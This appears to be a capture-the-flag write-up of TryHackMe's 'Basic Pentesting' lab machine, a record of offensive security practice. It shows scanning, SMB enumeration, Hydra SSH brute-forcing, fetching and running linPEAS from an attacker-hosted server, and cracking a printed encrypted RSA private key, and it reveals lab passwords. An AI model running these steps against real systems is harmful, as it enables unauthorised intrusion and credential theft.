CTF - TryHackMe: Basic Pentesting
Level: Easy
Introduction
Web App Testing and Privilege Escalation.
Table of Content
Reconnaissance
PREPARATION
# Make directory to work
<strong>mkdir Basic-Pentesting
cd Basic-Pentesting
mkdir scans</strong>
Rustscan
<strong>sudo rustscan -a 10.10.17.75 --ulimit 5000 -- -oA scans/ -sC -sV --script vuln</strong>
<strong>----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'</strong>
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy :
: https://github.com/RustScan/RustScan :
--------------------------------------
<strong>🌍HACK THE PLANET🌍</strong>
[~] The config file is expected to be at "/root/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
<strong>Open 10.10.17.75:22
Open 10.10.17.75:80
Open 10.10.17.75:139
Open 10.10.17.75:445
Open 10.10.17.75:8009
Open 10.10.17.75:8080</strong>
PORT STATE SERVICE REASON VERSION
<strong>22/tcp open ssh syn-ack ttl 63 OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)</strong>
<strong>80/tcp open http syn-ack ttl 63 Apache httpd 2.4.18 ((Ubuntu))</strong>
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-jsonp-detection: Couldn't find any JSONP endpoints.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-enum:
|_ /development/: Potentially interesting directory w/ listing on 'apache/2.4.18 (ubuntu)'
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-wordpress-users: [Error] Wordpress installation was not found. We couldn't find wp-login.php
<strong>139/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</strong>
<strong>445/tcp open netbios-ssn syn-ack ttl 63 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)</strong>
<strong>8009/tcp open ajp13 syn-ack ttl 63 Apache Jserv (Protocol v1.3)</strong>
<strong>8080/tcp open http syn-ack ttl 63 Apache Tomcat 9.0.7</strong>
| http-enum:
| /examples/: Sample scripts
| /manager/html/upload: Apache Tomcat (401 )
| /manager/html: Apache Tomcat (401 )
|_ /docs/: Potentially interesting folder
Host script results:
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: false
<strong>| smb-vuln-regsvc-dos:
| VULNERABLE:
| Service regsvc in Microsoft Windows systems vulnerable to denial of service</strong>
| <strong>State: VULNERABLE</strong>
| <strong>The service regsvc in Microsoft Windows 2000 systems is vulnerable to denial of service caused by a null deference
| pointer. This script will crash the service if it is vulnerable. This vulnerability was discovered by Ron Bowes
| while working on smb-enum-sessions.</strong>
| Port | Description |
| 22 | SSH (OpenSSH 7.2p2 Ubuntu 4ubuntu2.4) |
| 80 | Webserver (Apache httpd 2.4.18) |
| 139 / 445 | Samba smbd 3.X - 4.X |
| 8009 | Apache Jserv (Protocol v1.3) |
| 8080 | Apache Tomcat 9.0.7 |
What do we have
NIKTO
<strong>nikto -h 10.10.17.75</strong>
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 10.10.17.75
+ Target Hostname: 10.10.17.75
+ Target Port: 80
+ Start Time: 2023-05-28 23:46:18 (GMT2)
---------------------------------------------------------------------------
+ Server: Apache/2.4.18 (Ubuntu)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Server may leak inodes via ETags, header found with file /, inode: 9e, size: 56a870fbc8f28, mtime: gzip. See: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-1418
<strong>+ OPTIONS: Allowed HTTP Methods: POST, OPTIONS, GET, HEAD .
+ /development/: Directory indexing found.
+ /development/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/</strong>
+ 8074 requests: 0 error(s) and 8 item(s) reported on remote host
+ End Time: 2023-05-28 23:51:42 (GMT2) (324 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
DIRB
<strong>dirb http://10.10.17.75/</strong>
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sun May 28 23:47:37 2023
URL_BASE: http://10.10.17.75/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://10.10.17.75/ ----
==> DIRECTORY: <strong>http://10.10.17.75/development/</strong>
<strong>+ http://10.10.17.75/index.html (CODE:200|SIZE:158)
+ http://10.10.17.75/server-status (CODE:403|SIZE:299)</strong>
---- Entering directory: http://10.10.17.75/development/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sun May 28 23:50:35 2023
DOWNLOADED: 4612 - FOUND: 2
<strong>dirb http://10.10.17.75:8080/</strong>
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Mon May 29 00:08:01 2023
URL_BASE: http://10.10.17.75:8080/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
<strong>---- Scanning URL: http://10.10.17.75:8080/ ----
+ http://10.10.17.75:8080/docs (CODE:302|SIZE:0)
+ http://10.10.17.75:8080/examples (CODE:302|SIZE:0)
+ http://10.10.17.75:8080/favicon.ico (CODE:200|SIZE:21630)
+ http://10.10.17.75:8080/host-manager (CODE:302|SIZE:0)
+ http://10.10.17.75:8080/manager (CODE:302|SIZE:0) </strong>
-----------------
END_TIME: Mon May 29 00:10:56 2023
DOWNLOADED: 4612 - FOUND: 5
BURP SUITE
# Let's fire up Burp Suite and check <strong>http://10.10.17.75:80</strong>
Undergoing maintenance
Please check back later
# <strong>http://10.10.17.75/development/</strong>
[PARENTDIR] Parent Directory -
<strong>[TXT] dev.txt 2018-04-23 14:52 483
[TXT] j.txt 2018-04-23 13:10 235 </strong>
# <strong>http://10.10.17.75:8080/</strong>
Apache Tomcat v9.0.7 Webserver
# <strong>http://10.10.17.75:8080/manager/status</strong>
Login Page
dev.txt
2018-04-23: I've been messing with that <strong>struts</strong> stuff, and it's pretty cool! I think it might be neat
to host that on this server too. Haven't made any real web apps yet, but I have tried that example
you get to show off how it works (and it's the <strong>REST version of the example!</strong>). Oh, and right now I'm
using <strong>version 2.5.12</strong>, because other versions were giving me trouble. -K
2018-04-22: <strong>SMB</strong> has been configured. -K
2018-04-21: I got <strong>Apache</strong> set up. Will put in our content later. -J
j.txt
For J:
I've been auditing the contents of <strong>/etc/shadow</strong> to make sure we don't have any weak credentials,
and I was able to crack your hash really easily. You know our password policy, so please follow
it? <strong>Change that password ASAP</strong>.
-K
ENUm4LINUX
<strong>enum4linux 10.10.17.75</strong>
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 29 00:08:48 2023
=========================================( Target Information )=========================================
Target ........... 10.10.17.75
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.17.75 )============================
[+] Got domain/workgroup name: WORKGROUP
================================( Nbtstat Information for 10.10.17.75 )================================
Looking up status of 10.10.17.75
BASIC2 <00> - B <ACTIVE> Workstation Service
BASIC2 <03> - B <ACTIVE> Messenger Service
BASIC2 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
====================================( Session Check on 10.10.17.75 )====================================
[+] Server 10.10.17.75 allows sessions using username '', password ''
=================================( Getting domain SID for 10.10.17.75 )=================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
num4linux 10.10.17.75
Starting enum4linux v0.9.1 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Mon May 29 00:08:48 2023
=========================================( Target Information )=========================================
Target ........... 10.10.17.75
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
============================( Enumerating Workgroup/Domain on 10.10.17.75 )============================
[+] Got domain/workgroup name: WORKGROUP
================================( Nbtstat Information for 10.10.17.75 )================================
Looking up status of 10.10.17.75
BASIC2 <00> - B <ACTIVE> Workstation Service
BASIC2 <03> - B <ACTIVE> Messenger Service
BASIC2 <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
====================================( Session Check on 10.10.17.75 )====================================
[+] Server 10.10.17.75 allows sessions using username '', password ''
=================================( Getting domain SID for 10.10.17.75 )=================================
Domain Name: WORKGROUP
Domain Sid: (NULL SID)
[+] Can't determine if host is part of domain or part of a workgroup
==================================( Share Enumeration on 10.10.17.75 )==================================
<strong>Sharename Type Comment
--------- ---- -------
Anonymous Disk
IPC$ IPC IPC Service (Samba Server 4.3.11-Ubuntu)</strong>
SMB1 disabled -- no workgroup available
<strong>[+] Attempting to map shares on 10.10.17.75 </strong>
<strong>//10.10.17.75/Anonymous Mapping: OK Listing: OK Writing: N/A</strong>
[E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
//10.10.17.75/IPC$ Mapping: N/A Listing: N/A Writing: N/A
[+] Enumerating users using SID S-1-5-32 and logon username '', password ''
S-1-5-32-544 BUILTIN\Administrators (Local Group)
S-1-5-32-545 BUILTIN\Users (Local Group)
S-1-5-32-546 BUILTIN\Guests (Local Group)
S-1-5-32-547 BUILTIN\Power Users (Local Group)
S-1-5-32-548 BUILTIN\Account Operators (Local Group)
S-1-5-32-549 BUILTIN\Server Operators (Local Group)
S-1-5-32-550 BUILTIN\Print Operators (Local Group)
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
<strong>S-1-22-1-1000 Unix User\kay (Local User)
S-1-22-1-1001 Unix User\jan (Local User)</strong>
[+] Enumerating users using SID S-1-5-21-2853212168-2008227510-3551253869 and logon username '', password ''
S-1-5-21-2853212168-2008227510-3551253869-501 BASIC2\nobody (Local User)
S-1-5-21-2853212168-2008227510-3551253869-513 BASIC2\None (Domain Group)
SMB / WITH SMBCLIENT
<strong>smbclient -U Anonymous //10.10.17.75/Anonymous</strong>
Password for [WORKGROUP\Anonymous]: < Leave empty >
< Enter >
<strong>dir</strong>
. D 0 Thu Apr 19 19:31:20 2018
.. D 0 Thu Apr 19 19:13:06 2018
<strong>staff.txt </strong> N 173 Thu Apr 19 19:29:55 2018
<strong>get staff.txt</strong>
getting file \staff.txt of size 173 as staff.txt (1.1 KiloBytes/sec) (average 1.1 KiloBytes/sec)
Staff.txt
Announcement to staff:
PLEASE do not upload non-work-related items to this share. I know it's all in fun, but
this is how mistakes happen. (This means you too, <strong>Jan!</strong>)
<strong>-Kay</strong>
Exploitation
HYDRA - Brute Force SSH
<strong>hydra -l jan -P /usr/share/wordlists/rockyou.txt -t 10 -v -f -e nsr -o ssh-cred-output.txt ssh://10.10.17.75</strong>
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-05-29 00:47:36
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[DATA] max 10 tasks per 1 server, overall 10 tasks, 14344402 login tries (l:1/p:14344402), ~1434441 tries per task
[DATA] attacking ssh://10.10.17.75:22/
[VERBOSE] Resolving addresses ... [VERBOSE] resolving done
[INFO] Testing if password authentication is supported by ssh://[email protected]:22
[<strong>INFO] Successful, password authentication is supported by ssh://10.10.17.75:22</strong>
[STATUS] 110.00 tries/min, 110 tries in 00:01h, 14344292 to do in 2173:23h, 10 active
[STATUS] 85.67 tries/min, 257 tries in 00:03h, 14344145 to do in 2790:42h, 10 active
[STATUS] 72.86 tries/min, 510 tries in 00:07h, 14343892 to do in 3281:17h, 10 active
<strong>[22][ssh] host: 10.10.17.75 login: jan password: armando</strong>
[STATUS] attack finished for 10.10.17.75 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-05-29 00:58:18
SSH Login / with jan
<strong>ssh [email protected] </strong>
The authenticity of host '10.10.17.75 (10.10.17.75)' can't be established.
ED25519 key fingerprint is SHA256:XKjDkLKocbzjCch0Tpriw1PeLPuzDufTGZa4xMDA+o4.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? <strong>yes</strong>
Warning: Permanently added '10.10.17.75' (ED25519) to the list of known hosts.
[email protected]'s password: <strong>armando</strong>
Privilege Escalation
LINPEAS
# Navigate to tmp folder
<strong>cd tmp</strong>
# Run a SimpleHTTPServer on attacker machine to download linPEAS
<strong>sudo python3 -m http.server 8000</strong>
# Download linpeas.sh on target machine
<strong>wget http://10.11.8.178:8000/linpeas.sh</strong>
# Make executable
<strong>chmod +x linpeas.sh</strong>
# Run
<strong>./linpeas.sh</strong>
╔══════════╣ Superusers
root:x:0:0:root:/root:/bin/bash
╔══════════╣ Users with console
<strong>jan:x:1001:1001::/home/jan:/bin/bash
kay:x:1000:1000:Kay,,,:/home/kay:/bin/bash</strong>
root:x:0:0:root:/root:/bin/bash
══════════╣ Searching ssl/ssh files
╔══════════╣ Analyzing SSH Files (limit 70)
<strong>-rw-r--r-- 1 kay kay 3326 Apr 19 2018 /home/kay/.ssh/id_rsa</strong>
<strong>-----BEGIN RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75
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
-----END RSA PRIVATE KEY-----</strong>
-rw-r--r-- 1 kay kay 771 Apr 19 2018 /home/kay/.ssh/id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCzAsDwjb0ft4IO7Kyux8DWocNiS1aJqpdVEo+gfk8Ng624b9qOQp7LOWDMVIINfCuzkTA3ZugSyo1OehPc0iyD7SfJIMzsETFvlHB3DlLLeNFm11hNeUBCF4Lt6o9uH3lcTuPVyZAvbAt7xD66bKjyEUy3hrpSnruN+M0exdSjaV54PI9TBFkUmmqpXsrWzMj1QaxBxZMq3xaBxTsFvW2nEx0rPOrnltQM4bdAvmvSXtuxLw6e5iCaAy1eoTHw0N6IfeGvwcHXIlCT25gH1gRfS0/NdR9cs78ylxYTLDnNvkxL1J3cVzVHJ/ZfOOWOCK4iJ/K8PIbSnYsBkSnrIlDX27PM7DZCBu+xhIwV5z4hRwwZZG5VcU+nDZZYr4xtpPbQcIQWYjVwr5vF3vehk57ymIWLwNqU/rSnZ0wZH8MURhVFaNOdr/0184Z1dJZ34u3NbIBxEV9XsjAh/L52Dt7DNHWqUJKIL1/NV96LKDqHKCXCRFBOh9BgqJUIAXoDdWLtBunFKu/tgCz0n7SIPSZDxJDhF4StAhFbGCHP9NIMvB890FjJE/vys/PuY3efX1GjTdAijRa019M2f8d0OnJpktNwCIMxEjvKyGQKGPLtTS8o0UAgLfV50Zuhg7H5j6RAJoSgFOtlosnFzwNuxxU05ozHuJ59wsmn5LMK97sbow== I don't have to type a long password anymore!
-rw-rw-r-- 1 kay kay 771 Apr 23 2018 /home/kay/.ssh/authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQCzAsDwjb0ft4IO7Kyux8DWocNiS1aJqpdVEo+gfk8Ng624b9qOQp7LOWDMVIINfCuzkTA3ZugSyo1OehPc0iyD7SfJIMzsETFvlHB3DlLLeNFm11hNeUBCF4Lt6o9uH3lcTuPVyZAvbAt7xD66bKjyEUy3hrpSnruN+M0exdSjaV54PI9TBFkUmmqpXsrWzMj1QaxBxZMq3xaBxTsFvW2nEx0rPOrnltQM4bdAvmvSXtuxLw6e5iCaAy1eoTHw0N6IfeGvwcHXIlCT25gH1gRfS0/NdR9cs78ylxYTLDnNvkxL1J3cVzVHJ/ZfOOWOCK4iJ/K8PIbSnYsBkSnrIlDX27PM7DZCBu+xhIwV5z4hRwwZZG5VcU+nDZZYr4xtpPbQcIQWYjVwr5vF3vehk57ymIWLwNqU/rSnZ0wZH8MURhVFaNOdr/0184Z1dJZ34u3NbIBxEV9XsjAh/L52Dt7DNHWqUJKIL1/NV96LKDqHKCXCRFBOh9BgqJUIAXoDdWLtBunFKu/tgCz0n7SIPSZDxJDhF4StAhFbGCHP9NIMvB890FjJE/vys/PuY3efX1GjTdAijRa019M2f8d0OnJpktNwCIMxEjvKyGQKGPLtTS8o0UAgLfV50Zuhg7H5j6RAJoSgFOtlosnFzwNuxxU05ozHuJ59wsmn5LMK97sbow== I don't have to type a long password anymore!
Port 22
PermitRootLogin prohibit-password
PubkeyAuthentication yes
PermitEmptyPasswords no
ChallengeResponseAuthentication no
UsePAM yes
<strong>══╣ Possible private SSH keys were found!
/home/kay/.ssh/id_rsa</strong>
Credential Access
COPY PRIVATE SSH KEY
# Set permissions for private key
<strong>chmod 600 kay-ssh</strong>
# But the key is encrypted
-----BEGIN RSA PRIVATE KEY-----
<strong>Proc-Type: 4,ENCRYPTED
DEK-Info: AES-128-CBC,6ABA7DE35CDB65070B92C1F760E2FE75</strong>
CRACK THE KEY WITH John THE RIPPER
<strong>ssh2john kay-ssh > kay-ssh.hash</strong>
# Crack the SSH Key
<strong>john --wordlist=/usr/share/wordlists/rockyou.txt kay-ssh.hash</strong>
Created directory: /home/anyguy/.john
Using default input encoding: UTF-8
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 20 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
<strong>beeswax (kay-ssh) </strong>
1g 0:00:00:00 DONE (2023-05-29 01:20) 4.166g/s 345333p/s 345333c/s 345333C/s behlat..amaretto
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
# Show the password
<strong>john --show kay-ssh.hash </strong>
kay-ssh:beeswax
1 password hash cracked, 0 left
LOGIN WITH PRVATE KEY SSH
<strong>ssh -i </path/to/ssh/key> [email protected]</strong>
<strong>beeswax</strong>
Collection
<strong>ls -la</strong>
total 48
drwxr-xr-x 5 kay kay 4096 Apr 23 2018 .
drwxr-xr-x 4 root root 4096 Apr 19 2018 ..
-rw------- 1 kay kay 756 Apr 23 2018 .bash_history
-rw-r--r-- 1 kay kay 220 Apr 17 2018 .bash_logout
-rw-r--r-- 1 kay kay 3771 Apr 17 2018 .bashrc
drwx------ 2 kay kay 4096 Apr 17 2018 .cache
-rw------- 1 root kay 119 Apr 23 2018 .lesshst
drwxrwxr-x 2 kay kay 4096 Apr 23 2018 .nano
<strong>-rw------- 1 kay kay 57 Apr 23 2018 pass.bak</strong>
-rw-r--r-- 1 kay kay 655 Apr 17 2018 .profile
drwxr-xr-x 2 kay kay 4096 Apr 23 2018 .ssh
-rw-r--r-- 1 kay kay 0 Apr 17 2018 .sudo_as_admin_successful
-rw------- 1 root kay 538 Apr 23 2018 .viminfo
<strong>cat pass.bak</strong>
heresareallystrongpasswordthatfollowsthepasswordpolicy$$